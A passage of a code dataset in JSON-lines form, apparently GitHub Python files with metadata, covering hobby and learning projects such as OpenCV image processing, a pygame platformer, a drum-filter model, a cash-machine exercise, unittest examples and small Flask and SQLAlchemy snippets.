\"*50+\"average rating of all book availble in this store is \",averagerate)\n elif asking == \"particular\":\n print(\" \"*50+\"Here is your data configuration loading ......\")\n time.sleep(1)\n count = 0\n d = 0\n bookname= input(\" \"*50+\"Enter author name :\")\n for i in range(len(mainList)):\n if bookname==mainList[i][0]:\n count += 1\n if count == 1:\n print(\" \"*50+\"book rating\")\n print(\" \"*50+author[i]+\"|| rate \"+rate[i]+\"|| edition \"+edition[i])\n d +=float(rate[i])\n if count!=0:\n avar = d/count\n print(\" \"*50+\"Average rating of this book is \" + str(avar))\n\n if count==0:\n print(\" \"*50+\"Not a single book can be found of this name\")\n else:\n print(\" \"*50+\" You had not written properly what you want to find \")\n return rating()\n\n\n\n\n\n\n\n\n\n","repo_name":"rushabhshah2002/bookLibrarySystem","sub_path":"bookratingsearch.py","file_name":"bookratingsearch.py","file_ext":"py","file_size_in_byte":1972,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"45158422008","text":"'''\nCargue dos listas, y actualice la primer lista con los elementos que están en la segunda y no en la primera\n'''\n\n#lista1 = [12,23,34]\n\nlista2 = ['qwe','asd','zxc']\n'''\ncont = 0\n\nfor x in lista2:\n\tif cont <= len(lista2):\n\t\tlista1[cont] = lista2[x]\n\t\tcont += 1\n\nprint(lista1)\n'''\n\noriginar = list(lista2)\n\nlista2.reverse()\n\nprint(originar)\nprint(lista2)","repo_name":"Dihue/Course-Python","sub_path":"Informatorio/4-List_Tupla_Dicc/desafio01k.py","file_name":"desafio01k.py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"729685339","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[ ]:\n\n\nmotion_list=[]\nimport cv2, time,pandas\nstatic_back = None\nvideo = cv2.VideoCapture(0)\nwhile True:\n\tcheck, frame = video.read()\n\tmotion = 0\n\tgray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\tgray = cv2.GaussianBlur(gray, (21, 21), 0)\n\tif static_back is None:\n\t\tstatic_back = gray\n\t\tcontinue\n\tdiff_frame = cv2.absdiff(static_back, gray)\n\tthresh_frame = cv2.threshold(diff_frame, 30, 255, cv2.THRESH_BINARY)[1]\n\tthresh_frame = cv2.dilate(thresh_frame, None, iterations = 2)\n\tcnts,_ = cv2.findContours(thresh_frame.copy(),\n\t\t\t\t\tcv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n\tfor contour in cnts:\n\t\tif cv2.contourArea(contour) < 10000:\n\t\t\tcontinue\n\t\tmotion = 1\n\t\t(x, y, w, h) = cv2.boundingRect(contour)\n\t\t\n\t\tcv2.rectangle(frame, (x, y), (x + w, y + h), (0, 255, 0), 3)\n\n \n\tmotion_list.append(motion)\n\tcv2.imshow(\"Gray Frame\", gray)\n\tcv2.imshow(\"Difference Frame\", diff_frame)\n\tcv2.imshow(\"Threshold Frame\", thresh_frame)\n\tcv2.imshow(\"Color Frame\", frame)\n\tkey = cv2.waitKey(100)\n\tif key == ord('q'):\n\t\tbreak\nvideo.release()\ncv2.destroyAllWindows()\n\n\n# In[ ]:\n\n\nimport cv2\nimport numpy as np\n\nimage1 = cv2.imread('bp1.jpg')\n\nimg = cv2.cvtColor(image1, cv2.COLOR_BGR2GRAY)\n\nthresh1 = cv2.adaptiveThreshold(img, 255, cv2.ADAPTIVE_THRESH_MEAN_C,\n\t\t\t\t\t\t\t\t\t\tcv2.THRESH_BINARY, 199, 5)\n\nthresh2 = cv2.adaptiveThreshold(img, 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C,\n\t\t\t\t\t\t\t\t\t\tcv2.THRESH_BINARY, 199, 5)\nret,thresh3 = cv2.threshold(img,127,255,cv2.THRESH_BINARY)\n \ncv2.imshow('Adaptive Mean', img)\ncv2.imshow('Adaptive Gaussian', thresh2)\ncv2.imshow('n', thresh3)\n\n \nif cv2.waitKey(0) & 0xff == 27:\n\tcv2.destroyAllWindows()\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\nimport cv2\nimport numpy as np\n \nimg1 = cv2.imread('1.png') \nimg2 = cv2.imread('input2.png')\ndim = (500, 500)\n\ndest_and = cv2.bitwise_and(img2, img1, mask = None)\n\ncv2.imshow('Bitwise And', dest_and)\n\nif cv2.waitKey(0) & 0xff == 27:\n cv2.destroyAllWindows()\n\n\n# In[4]:\n\n\nimport cv2\nimport numpy as np\n \nimg1 = cv2.imread('11.png') \nimg2 = cv2.imread('12.png')\ndim = (500, 500)\n\n \ndest_and = cv2.bitwise_or(img2, img1, mask = None)\n \ncv2.imshow('Bitwise or', dest_and)\n \n \nif cv2.waitKey(0) & 0xff == 27:\n cv2.destroyAllWindows()\n\n\n# In[3]:\n\n\nimport cv2\nimport numpy as np\n\nimg1 = cv2.imread('11.png') \nimg2 = cv2.imread('12.png')\ndim = (500, 500)\n\ndest_and = cv2.bitwise_not(img2, mask = None)\n\ncv2.imshow('Bitwise not', dest_and)\n\nif cv2.waitKey(0) & 0xff == 27:\n cv2.destroyAllWindows()\n\n\n# In[5]:\n\n\nimport cv2\nimport numpy as np\n\nimg1 = cv2.imread('11.png')\nimg2 = cv2.imread('12.png')\n\ndest_xor = cv2.bitwise_xor(img1, img2, mask = None)\n\ncv2.imshow('Bitwise XOR', dest_xor)\n\nif cv2.waitKey(0) & 0xff == 27:\n\tcv2.destroyAllWindows()\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"Adithya65/OPENCV_GECBH","sub_path":"day3.py","file_name":"day3.py","file_ext":"py","file_size_in_byte":2748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26889114957","text":"import matplotlib.pyplot as plt\nimport math\nfrom numpy.lib.financial import irr\nfrom sklearn import metrics\nfrom scipy.integrate import odeint\nimport numpy as np\n\n\"\"\" ------ SIMULACIÓN DINÁMICA: FILTRACIÓN EN UN TAMBOR ROTATORIO DE VACÍO ------ \"\"\"\n### Bioseparaciones (2011), Tejeda, et. al\n### Operaciones unitarias en ingeniería química (2007), McCabe, et al\n### Solid/Liquid separations Principles of Industrial Filtration (2005) Wakeman, Tarleton\n\nclass RVDF:\n def __init__(self,P_diff,rd,L,Af,tf, filtration_angle,wsh_angle,dew_angle1,dew_angle2,w,Rm,nivel):\n '''\n PARÁMETROS DEL FILTRO DE TAMBOR ROTATORIO AL VACÍO\n\n P_diff: Presión del vacío en el tambor [Pa]\n rd: Radio del tambor [m]\n L: Largo del tambor [m]\n Af: Área de filtración [m2]\n tf: Tiempo de filtración\n filtration_angle: Ángulo de filtración del tambor [°]\n wsh_angle: Ángulo de lavado del tambor [°]\n dew_angle: Ángulo de secado del tambor [°]\n w: Velocidad de rotación [rpm]\n Rm: Resistencia del medio filtrante\n nivel: Nivel del tanque de lodos []\n '''\n self.P_diff = P_diff # Caída de presión [Pa]\n self.rd = rd # [m]\n self.L = L # [m]\n self.filtration_angle = filtration_angle # [°]\n self.wsh_angle = wsh_angle # [°]\n self.dew_angle1 = dew_angle1 # [°]\n self.dew_angle2 = dew_angle2 # [°]\n self.w = w # [rpm]\n self.Af = Af # Área de filtración [m2]\n self.tf = tf # Tiempo de filtración [s]\n self.Rm = Rm # Resistencia del medio filtrante\n self.nivel = nivel # nivel del tanque []\n\n def drum_filter_area(rd,L,filtration_angle):\n '''\n CÁLCULO DEL ÁREA DE FILTRACIÓN DEL TAMBOR\n rd: Radio del tambor [m]\n L: Largo del tambor [m]\n filtration_angle: Ángulo de filtración del tambor [°]\n '''\n A = 2*math.pi*rd*L*(filtration_angle/360)\n \n return A\n\n def angle_to_time(phi,omega):\n '''\n CÁLCULO DEL ÁNGULO DE FILTRACIÓN A TIEMPO DE FILTRACIÓN\n phi: Ángulo [°]\n omega: Velocidad de rotación del tambor [rpm]\n '''\n phi = np.deg2rad(phi)\n omega = omega/60 # revolutions per min to revolutions per second\n tf = phi/(2*math.pi*omega) # [s]\n\n return tf\n\n def real_filtration_angle(filtration_angle, dew1_angle, nivel):\n theta_perdido = np.rad2deg(np.arcsin(1-nivel))\n filtration_angle = filtration_angle - 2*theta_perdido\n dew1_angle = dew1_angle + theta_perdido\n\n return filtration_angle, dew1_angle\n\nclass slurry_cake:\n\n \"\"\" PARÁMETROS DE LOS LODOS Y LA TORTA \"\"\"\n\n def __init__(self,alpha,u,c,k,epsilon,solid_dens,filtrate_dens,surface_tension,incompressible,s):\n self.u = u # Viscosidad de la suspensión [Pa*s]\n self.c = c # Sólidos secos por unidad de volumen filtrado [kg/m3]\n self.k = k # Permeabilidad de la torta[m2]\n self.s = s # índice de compresibilidad []\n self.epsilon = epsilon # Porosidad de la torta []\n self.solid_dens = solid_dens # Densidad de sólidos [kg/m3]\n self.filtrate_dens = filtrate_dens # Densidad del jugo filtrado[kg/m3]\n self.surface_tension = surface_tension # Tensión superficial del filtrado [N/m]\n self.incompressible = incompressible # True / False\n self.alpha = alpha # Resistencia específica de la torta [m/kg]\n \n\n def calc_alpha(incompressible,k,solid_dens,epsilon,alpha_prima,P_diff,s):\n\n \"\"\" CÁLCULO DE LA RESISTENCIA DINÁMICA DE LA TORTA \"\"\"\n\n if incompressible:\n s = 0\n alpha = 1/(k*solid_dens*(1-epsilon)) # [m/kg]\n else:\n alpha = alpha_prima*(P_diff**s) # [m/kg]\n\n return alpha","repo_name":"juanmaro97/RVF_model","sub_path":"RVDF.py","file_name":"RVDF.py","file_ext":"py","file_size_in_byte":4009,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26466198537","text":"# stwórz klasę CashMachine która będzie rzucać wyjatki:\r\n# - jeśli błędna kwota (nie dzieli się przez 50) WrongAmountError\r\n# - jeśli nie da się wydać banknotów EmptyError\r\n# - za dużo banknotów w szufladzie BasketFullError\r\n\r\nfrom Obiekty_obiektowosc.Obiekty_Zad_4_bankomat_wersjawykladowcy import CashMachine\r\nfrom Obiekty_obiektowosc.Obiekty_Zad_7_wyjatki_dla_bankomatu import *\r\n\r\n\r\nclass CashMachineLimit(CashMachine): # trzeba było zaimportować klasę CashMachine z \"Obiekty_Zad_4_bankomat_wersjawykladowcy\"\r\n def __init__(self, limit):\r\n super().__init__()\r\n self._limit = limit\r\n\r\n def put_money(self, banknotes):\r\n if len(self._szuflada) + len(banknotes) > self._limit:\r\n raise BasketFullError # to obsługa przykłdu szczególnego, gdy chcialibyśmy wrzucić za dużo\r\n super().put_money(banknotes) # to jest z nadklasy\r\n\r\n def withdraw_money(self, amount):\r\n if amount % 50 != 0:\r\n raise WrongAmountError\r\n\r\n wyplata = super().withdraw_money(amount)\r\n if not wyplata: # najpierw było tak: if sum(wyplata) != amount:\r\n raise EmptyError\r\n\r\n return wyplata\r\n\r\n\r\n\r\ncm = CashMachineLimit(5) # ile banknotów miesci szuflada\r\n\r\ntry:\r\n cm.put_money([100,200,100,50,100,100]) # ==> BasketFullError\r\n cm.put_money([200,100,100])\r\n cm.withdraw_money(150) # ==> EmptyError, ten błąd jest kiedy nie można zrealizować\r\n cm.withdraw_money(140) # ==> WrongAmountError, ten błąd jest kiedy się nie dzieli przez 50\r\nexcept CashMachineError as a: # złap błąd i wrzuć go na zmienną\r\n print('hurra, mamy błąd :) ')\r\n print(type(a))\r\n\r\n\r\n\"\"\"\r\nraise WrongAmountError # trzeba napisać przyk. błąd z pliku \"Obiekty_obiektowosc.Obiekty_Zad_7_wyjatki_dla_bankomatu\"\r\n # to co się pojawi u góry \"from Obiekty_obiektowosc.Obiekty_Zad_7_wyjatki_dla_bankomatu import WrongAmountError\"\r\n # zamieniam na \"from Obiekty_obiektowosc.Obiekty_Zad_7_wyjatki_dla_bankomatu import *\"\r\nPo zaimportowaniu możemy ten raise wyrzucić lub zakomentować\r\n\"\"\"\r\n","repo_name":"PatrycjaHomosapiens/Python","sub_path":"Obiekty_Zad_7_bankomat_z_wyjatkami_moje.py","file_name":"Obiekty_Zad_7_bankomat_z_wyjatkami_moje.py","file_ext":"py","file_size_in_byte":2134,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22643617077","text":"import pygame\nimport sys\nfrom pygame.locals import * # used for keys and events\nfrom levels import world\nfrom art import draw_tile\n\n# Game set up\npygame.init()\nFPS = 60\nfpsClock = pygame.time.Clock()\nwindow_width = 1200\nwindow_height = 600\nwindow = pygame.display.set_mode((window_width, window_height))\npygame.display.set_caption('Object Platformer')\nicon = pygame.Surface((20, 20))\npygame.display.set_icon(icon)\n\n# initializing font for later use\npygame.font.init()\nfont = pygame.font.SysFont('arial', 40)\n\n# used for get FPS\ntick = pygame.time.Clock()\n\n# list of entities to track them all\nentities = []\n\n# takes input of (value, [minimum, maximum]) to clamp.\ndef clamp(value, val_range):\n if value < val_range[0]: return val_range[0]\n if value > val_range[1]: return val_range[1]\n return value\n\nclass Entity(object):\n def __init__(self, x, y, width, height, color, type):\n self.rect = pygame.Rect(x, y, width, height)\n entities.append(self)\n self.color = color\n self.type = type\n def delete_self(self):\n entities.remove(self)\n del self \n def draw(self, x_displacement, y_displacement):\n new_rect = pygame.Rect(self.rect.x - x_displacement, self.rect.y - y_displacement, \n self.rect.width, self.rect.height)\n if new_rect.colliderect(pygame.Rect(0, 0, 1200, 600)): # if on screen, draws\n if self.type == \"Platform\":\n draw_tile(window, new_rect.x, new_rect.y, self.color)\n else:\n pygame.draw.rect(window, self.color, new_rect)\n\nclass Platform(Entity):\n def __init__(self, x, y, color):\n super().__init__(x, y, 30, 30, color, \"Platform\")\n\nclass Player(Entity):\n def __init__(self, x, y):\n super().__init__(x, y, 20, 20, (0, 0, 255), \"Player\")\n self.y_vel = 0\n self.x_vel = 0\n\n self.x_dir = 0\n self.dash_counter = 0\n\n self.on_ground = False\n self.previously_jumping = False\n self.double_jump = False\n self.double_jump_counter = 0\n \n self.pos_upon_reset = (x, y)\n self.ask_to_advance_level = False\n\n # used for tracer\n self.previous_positions = [(x, y), (x, y), (x, y), (x, y), (x, y), (x, y), (x, y), (x, y), (x, y), \n (x, y), (x, y), (x, y), (x, y), (x, y), (x, y), (x, y), (x, y), (x, y), (x, y), (x, y), (x, y), (x, y), \n (x, y), (x, y), (x, y), (x, y), (x, y), (x, y), (x, y), (x, y), (x, y), (x, y), (x, y), (x, y), (x, y), \n (x, y), (x, y), (x, y), (x, y), (x, y), (x, y), (x, y), (x, y), (x, y)]\n\n def move(self):\n key = pygame.key.get_pressed()\n if key[K_LEFT] or key[K_a]:\n self.x_vel -= 1\n self.x_dir = -15\n if key[K_RIGHT] or key[K_d]:\n self.x_vel += 1\n self.x_dir = 15\n if key[K_r]:\n self.reset_pos()\n\n if self.x_vel > 0: # friction\n self.x_vel -= 0.5\n elif self.x_vel < 0:\n self.x_vel += 0.5\n if self.x_vel > 8: # extra friction\n self.x_vel -= 0.5\n elif self.x_vel < -8:\n self.x_vel += 0.5\n if self.x_vel > 12: # extra extra friction\n self.x_vel -= 0.5\n elif self.x_vel < -12:\n self.x_vel += 0.5\n self.y_vel = clamp(self.y_vel, (-14, 14)) # y-terminal velocity\n\n if key[K_SPACE] and self.dash_counter <= 0:\n self.x_vel += self.x_dir\n self.dash_counter = 60\n\n if self.dash_counter > 0:\n self.dash_counter -= 1\n\n # jumping\n if (key[K_UP] or key[K_w]) and not self.previously_jumping:\n if self.on_ground:\n self.y_vel = -10\n elif self.double_jump and self.double_jump_counter > 5:\n self.y_vel = -10\n self.double_jump = False\n \n if key[K_UP] or key[K_w]: # setting this frame's values for next frame\n self.previously_jumping = True\n else:\n self.previously_jumping = False\n\n if not self.on_ground: # gravity\n self.y_vel += 0.3\n self.double_jump_counter += 1\n if key[K_DOWN] or key[K_s]:\n self.y_vel += 0.7\n \n self.on_ground = False # assumes you aren't on the ground until later proven wrong\n \n self.collide(0, self.y_vel) # separate collisions for x and y\n self.collide(self.x_vel, 0)\n\n self.previous_positions.append((self.rect.x, self.rect.y)) # adding previous position\n average_x = (self.rect.x + self.previous_positions[-1][0])/2 # getting an in-between frame\n average_y = (self.rect.y + self.previous_positions[-1][1])/2\n self.previous_positions.append((average_x, average_y)) # adding it\n del self.previous_positions[0] # removing old frames\n del self.previous_positions[0]\n\n def collide(self, x, y):\n self.rect.y += y\n self.rect.x += x\n\n ground_touched_list = []\n for ent in entities:\n if ent.type == \"Platform\":\n if self.rect.colliderect(ent.rect):\n \n if ent.color == \"Grass\" or ent.color == \"Dirt\": # does collisions with these walls\n if x > 0:\n self.rect.right = ent.rect.left\n self.x_vel = 0\n elif x < 0:\n self.rect.left = ent.rect.right\n self.x_vel = 0\n if y > 0:\n self.rect.bottom = ent.rect.top\n self.y_vel = 0\n elif y < 0:\n self.rect.top = ent.rect.bottom\n ground_touched_list.append(\"Dirt\")\n \n else: # appends other things to the list to deal with later\n ground_touched_list.append(ent.color)\n if ent.color == \"Bomb\":\n ground_touched_list.append(ent.rect.center)\n \n # if you are touching the top of grass/dirt, then you are considered on the ground.\n if (ent.color == \"Grass\" or ent.color == \"Dirt\") and self.rect.bottom == ent.rect.top and \\\n self.rect.left in range (ent.rect.left - self.rect.width, ent.rect.right):\n self.on_ground = True\n self.double_jump_counter = 0\n self.double_jump = True\n\n # if you touched the ground, it overrides everything else\n if ground_touched_list.count(\"Dirt\") == 0:\n\n if ground_touched_list.count(\"Trampoline\") > 0:\n if -2 < self.y_vel > 2: self.y_vel *= -1\n self.y_vel -= 1.5\n\n elif ground_touched_list.count(\"Side Trampoline\") > 0:\n if x > 0: # if you were moving right,\n self.x_vel = -30\n if x < 0: # if you were moving left,\n self.x_vel = 30\n self.y_vel -= 4 \n \n elif ground_touched_list.count(\"Bomb\") > 0:\n for value in ground_touched_list:\n if type(value) == tuple: # bombs add another value, a tuple, including \n x_diff = self.rect.centerx - value[0] # their coords. a bit jank, but the cleanest\n y_diff = self.rect.centery - value[1] # implementation with the current system\n total_diff = (abs(x_diff) + abs(y_diff)) # i could find\n\n x_vector = x_diff / total_diff\n y_vector = y_diff / total_diff\n\n self.x_vel = int(x_vector * 50)\n self.y_vel = int(y_vector * 100)\n break\n\n elif ground_touched_list.count(\"Exit\") > 0:\n self.ask_to_advance_level = True\n\n else: # if you only touched lava, lava triggers\n if ground_touched_list.count(\"Lava\") > 0:\n self.reset_pos()\n \n \n def reset_pos(self):\n self.rect.x = self.pos_upon_reset[0]\n self.rect.y = self.pos_upon_reset[1]\n self.x_vel = 0\n self.y_vel = 0\n\n\ndef generate_level(level, player):\n # making a list of all platforms, then deleting them\n to_del = [ent for ent in entities if ent.type == \"Platform\"]\n for thing_to_del in to_del:\n thing_to_del.delete_self()\n \n # adding new platforms\n x = 0\n y = 0\n for row in level:\n for value in row:\n if value == \"G\":\n Platform(x, y, \"Grass\")\n if value == \"D\":\n Platform(x, y, \"Dirt\")\n if value == \"T\":\n Platform(x, y, \"Trampoline\")\n if value == \"t\":\n Platform(x, y, \"Side Trampoline\")\n if value == \"B\":\n Platform(x, y, \"Bomb\")\n if value == \"L\":\n Platform(x, y, \"Lava\")\n if value == \"E\":\n Platform(x, y, \"Exit\")\n if value == \"R\":\n player.pos_upon_reset = (x+5, y+10)\n x += 30\n x = 0\n y += 30\n\ndef max_camera_values(level):\n # starts values at 0 and adds 30 (platform height and width) for each additional platform there is \n # going right/down after the regular size of one screen (40 width, 20 height)\n max_length = 0\n for row in level:\n max_length = max(len(row), max_length)\n max_length = (max_length - 40) * 30\n max_height = (len(level) - 20) * 30\n return max_length, max_height\n\ndef main():\n # define\n player = Player(40, 550)\n \n level = 0\n generate_level(world[level], player)\n max_length, max_height = max_camera_values(world[level])\n player.reset_pos()\n\n previous_backspace = False\n show_FPS = False\n FPS_list = [60, 60, 60, 60]\n\n while True:\n for event in pygame.event.get():\n if event.type == QUIT:\n pygame.quit()\n sys.exit()\n window.fill((0, 0, 0))\n\n # moving player\n player.move()\n\n # camera things\n x_distance = player.rect.x - 570 # finding how much displacement is needed to center player\n y_distance = player.rect.y - 300\n x_displacement = clamp(x_distance, (0, max_length)) # clamping the displacement so it doesn't show off-stage\n y_displacement = clamp(y_distance, (0, max_height))\n\n # drawing the entities\n for ent in entities:\n ent.draw(x_displacement, y_displacement)\n player.draw(x_displacement, y_displacement) # drawing player again to make sure it's on top\n \n # drawing the tracer\n s = pygame.Surface((20, 20))\n for tracer in player.previous_positions:\n s.fill((0, 0, 255))\n s.set_alpha(player.previous_positions.index(tracer)/3) # alpha based on index\n window.blit(s, (tracer[0] - x_displacement, tracer[1] - y_displacement))\n\n # going to next level\n if player.ask_to_advance_level:\n level += 1\n generate_level(world[level], player)\n max_length, max_height = max_camera_values(world[level])\n player.ask_to_advance_level = False\n player.reset_pos()\n \n if pygame.key.get_pressed()[K_BACKSPACE]:\n if previous_backspace == False:\n if show_FPS: \n show_FPS = False\n else:\n show_FPS = True\n previous_backspace = True\n else:\n previous_backspace = False\n\n tick.tick() # doing this calculation even when not using it so that\n FPS_list.append(int(tick.get_fps())) # the FPS displayed when it is shown is more accurate\n del FPS_list[0]\n average_FPS = sum(FPS_list) / len(FPS_list)\n\n if show_FPS:\n if average_FPS < 15:\n color = (255, 0, 0)\n elif average_FPS < 30:\n color = (255, 255, 0)\n else:\n color = (255, 255, 255)\n window.blit(font.render(f\"FPS: {average_FPS}\", True, color), pygame.Rect(1000, 2, 0, 0))\n\n # making game run\n fpsClock.tick(FPS)\n pygame.display.update()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"PikaToo/ObjectPlatformer","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":12642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9169269822","text":"import threading\nfrom django.core import mail\n\nclass EmailThread(threading.Thread):\n def __init__(self, subject, plain_message, from_email, to_email, html_message):\n self.subject = subject\n self.plain_message = plain_message\n self.from_email = from_email\n self.to_email = to_email\n self.html_message = html_message\n super(EmailThread, self).__init__()\n\n def run(self):\n mail_send = mail.send_mail(self.subject, self.plain_message, self.from_email, [self.to_email], html_message=self.html_message)\n print('mail send successfully ', mail_send)","repo_name":"irshad-basha-shaik/assets","sub_path":"asst/assetapp/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25850979287","text":"import re\nimport os\nimport math\n\ndef eachdir(path):\n pathdir = os.listdir(path)\n dic = list()\n for p in pathdir:\n f = os.path.join('%s/%s' %(path, p))\n dic.append(f)\n return dic\n\ndef getfiles(filepath):\n path = os.listdir(filepath)\n filenames = list()\n for p in path:\n filename = os.path.join('%s/%s' %(filepath, p))\n filenames.append(filename)\n return filenames\n\ndef getdata(filename):\n# print filename\n data = open(filename, 'r').read().decode('euc-kr')\n titles = re.findall('(.*?)', data, re.S)\n subtitles = re.findall('(.*?)', data, re.S)\n bodys = re.findall('(.*?)', data, re.S)\n title = \"\"\n subtitle = \"\"\n body = \"\"\n for t in titles:\n #t = unicode(t, 'utf-8')\n t = t.replace('\\n', ' ')\n t = re.sub(u'[^\\uAC00-\\uD7A3 ]', '', t)\n t = re.sub('[ ]+', ' ', t)\n title = title + t\n for t in subtitles:\n #t = unicode(t, 'utf-8')\n t = t.replace('\\n', ' ')\n t = re.sub(u'[^\\uAC00-\\uD7A3 ]', '', t)\n t = re.sub('[ ]+', ' ', t)\n subtitle = subtitle + t\n for t in bodys:\n #t = unicode(t, 'utf-8')\n t = t.replace('\\n', ' ')\n t = re.sub(u'[^\\uAC00-\\uD7A3 ]', '', t)\n t = re.sub('[ ]+', ' ', t)\n body = body + t\n return title.strip(' '), subtitle.strip(' '), body.strip(' ')\n\n\n\ndef predata(i, lable, filename):\n title, subtitle, body = getdata(filename)\n train = open('train','a')\n test = open('test', 'a')\n text = title.strip(' ')\n text = text.split(' ')\n title = \"\"\n for t in text:\n for j in range(len(t)):\n title = title + t[j:j+1] + \" \"\n title = title.strip(' ')\n if i <= 5001:\n train.write(str(lable) + \"xkx\" + title.encode('utf-8') + '\\n')\n else:\n test.write(str(lable) + \"xkx\" + title.encode('utf-8') + '\\n')\n train.close()\n test.close()\n\ndef main(data):\n child = eachdir(data)\n lables = {'15':0, '16':1, '21':2, '22':3, '23':4, '24':5, '25':6, '3B':7, '4':8, '52':9, 'G1':10, 'G2':11}\n for c in child:\n j = 0\n lable = lables[c[8:]]\n filenames = getfiles(c)\n for filename in filenames:\n predata(j, lable, filename)\n j = j + 1\n\nmain('../data')\n","repo_name":"voltelxu/some","sub_path":"lstm/getdata.py","file_name":"getdata.py","file_ext":"py","file_size_in_byte":2309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70078066090","text":"from enum import Enum\n\nfrom sqlalchemy import Column, String, MetaData, Table, Integer, ForeignKey, BigInteger\n\nfrom models.posts import posts\n\n\nclass Status(Enum):\n coursing = \"coursing\"\n on_feeling_tracker = \"on_feeling_tracker\"\n off_feeling_tracker = \"off_feeling_tracker\"\n inactive = \"inactive\"\n\n\nmetadata_users = MetaData()\n\nusers = Table(\n \"users\",\n metadata_users,\n Column(\"id\", Integer, primary_key=True),\n Column(\"user_id\", BigInteger),\n Column(\"next_post_id\", Integer, ForeignKey(posts.c.id)),\n Column(\"status\", String),\n)\n","repo_name":"TsaTsaTsa/KLTelegramBot","sub_path":"CourseProject/CourseProject/models/users.py","file_name":"users.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4529818818","text":"# 11.2.4  方法 setUp()\n# 在前面的 test_survey.py 中,\n# 我们在每个测试方法中都创建了一个 AnonymousSurvey 实例,并在每个方法中都创建了答案。\n# unittest.TestCase 类包含方法 setUp() ,\n# 让我们只需创建这些对象一次,并在每个测试方法中使用它们。\n# 如果你在 TestCase 类中包含了方法 setUp() , \n# Python 将先运行它,再运行各个以 test_ 打头的方法。\n# 这样,在你编写的每个测试方法中都可使用在方法 setUp() 中创建的对象了。\n# 下面使用 setUp() 来创建一个调查对象和一组答案,供方法 test_store_single_response() 和 test_store_three_responses() 使用:\nimport unittest\nfrom survey import AnonymousSurvey\n\nclass TestAnonymousSurvey(unittest.TestCase):\n \"\"\"针对AnonysSurvey类的测试\"\"\"\n def setUp(self):\n \"\"\"\n 创建一个调查对象和一组答案,供使用的测试方法使用\n \"\"\"\n question = 'WHat language did you first learn to speak?'\n self.my_survey = AnonymousSurvey(question)\n self.responses = ['English','Spanish','Mandarin']\n\n def test_store_single_response(self):\n \"\"\"测试单个答案会被妥善地存储\"\"\"\n self.my_survey.store_response(self.responses[0])\n self.assertIn(self.responses[0], self.my_survey.responses)\n\n def test_store_three_responses(self):\n \"\"\"测试三个答案会被妥善地存储\"\"\"\n for response in self.responses:\n self.my_survey.store_response(response)\n for response in self.responses:\n self.assertIn(response, self.my_survey.responses)\nunittest.main()","repo_name":"pangfeiyo/PythonLearn","sub_path":"Python:从入门到实践/从入门到实践代码/第11章 测试代码/11.2 测试类/方法setUp().py","file_name":"方法setUp().py","file_ext":"py","file_size_in_byte":1666,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18433237037","text":"from flask import Flask, render_template\nimport modules.dinstation\n\napp = Flask(__name__)\n\n\n@app.route('/')\ndef hello():\n return 'pendler-statistik'\n\n\n@app.route('/trains')\ndef trains():\n trains = modules.dinstation.get_trains(\"HH\")\n return render_template('trains.html', trains=trains)\n\n\nif __name__ == '__main__':\n # This is used when running locally only. When deploying to Google App\n # Engine, a webserver process such as Gunicorn will serve the app. You\n # can configure startup instructions by adding `entrypoint` to app.yaml.\n app.run(host='127.0.0.1', port=8080, debug=True)\n","repo_name":"rasmusselsmark/pendler-statistik-appengine","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14834143473","text":"import time\n\nfrom thread_example import call_slow_fibonacci, has_call_finished, get_call_value\n\n# Call this file if you want to check how it's supposed to work in pure python\nif __name__ == '__main__':\n index = 35 # This should be slow enough to last a few seconds\n thread_id = call_slow_fibonacci(index)\n\n while not has_call_finished(thread_id):\n print('Waiting for the task to finish...')\n time.sleep(0.3)\n\n value = get_call_value(thread_id)\n print(f'Fibonacci number {index} equals to {value}')\n","repo_name":"overfl0/Pythia","sub_path":"examples/@PythiaThread/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"en","doc_type":"code","stars":59,"dataset":"github-code","pt":"53"} +{"seq_id":"38598574558","text":"str_ = input()\ndata = [str_[i:i+2] for i in range(0,len(str_),2)]\n\nscore = {\"A\" : 0, \"B\" : 0}\n\nfor point in data:\n score[point[0]] += int(point[1])\n\nif score[\"A\"] > score[\"B\"]:\n print(\"A\")\nelse:\n print(\"B\")","repo_name":"Bhdzhdz/competitive-programming","sub_path":"kattis/problems/basketballoneonone.py","file_name":"basketballoneonone.py","file_ext":"py","file_size_in_byte":216,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11724514267","text":"import pandas as pd\r\nimport quandl, math\r\nimport numpy as np\r\nfrom sklearn import preprocessing, svm, model_selection\r\nfrom sklearn.linear_model import LinearRegression\r\n\r\n\r\n\r\ndf = quandl.get(\"CHRIS/MGEX_IH1\", 